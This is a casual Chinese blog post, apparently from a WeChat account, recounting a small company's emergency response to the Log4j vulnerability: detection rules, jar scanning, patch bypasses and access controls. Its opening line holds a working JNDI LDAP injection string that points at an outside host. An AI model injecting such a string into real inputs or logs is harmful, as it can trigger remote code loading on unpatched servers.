Log4j......

#这是一篇随手水文=${jndi:ldap://{{2xxxx.maliciouskr.cc/poc}

      开源项目 Log4j ，网传只有三个人用业余时间在搞，因为 @Woonsan Ko 同学的 JNDI Lookup plugin support ，掀起了这场腥风血雨。看火线的影响面统计，目前影响60644个开源软件，涉及相关版本软件包321094个。

受其漏洞影响，一些公有云厂商直接关停了相关服务，如下：

       这几天，安全工程师们都在忙着验漏洞、补漏洞。上个周四晚上，大厂的安全已经忙得不可开交、通宵奋战，小厂的我们，也就在朋友圈看看戏。周五应急还是可以先来一波，基本思路就是：先尽可能封堵风险，剩下的留给研发慢慢修！

       复盘下这两天的应急情况：

• waf、ips、nta、hids 上规则，先防一波，止血。（虽然规则容易被绕过，但总比没有强）

• hids组件分析，jar包扫一遍，看看有多少受影响，结果...没啥卵用，用这玩意儿的可真多！

• 学习网友，使用dnslog弹一弹，感觉可以打穿整个世界！

  
  

• 通知研发先自查自修，早上通告刚发出去，补丁又被绕过了；所以，补丁升级先别急，先改配置上临时应急策略，免得补丁被绕过白折腾，被吐槽。

  
  

• 研究下POC，搞个批量扫描，检测下互联网业务！折腾一天，盲查发现一两个，这漏洞很难通过黑盒模式检测全面，还是得逐一系统本地排查。

• 最痛苦的基础架构支撑软件、虚拟化、硬件盒子，比如V**系列，那可就更酸爽了，有些修复都别指望，毕竟用的社（po）区（jie）免费版，只能先内外做好访问控制，加强监控。

• 过去几天了，继续一一排查加固吧，一波未平，一波又起。

沉迷于挖洞、补洞无法自拔

原文始发于微信公众号（塔奇赛克）：Log4j......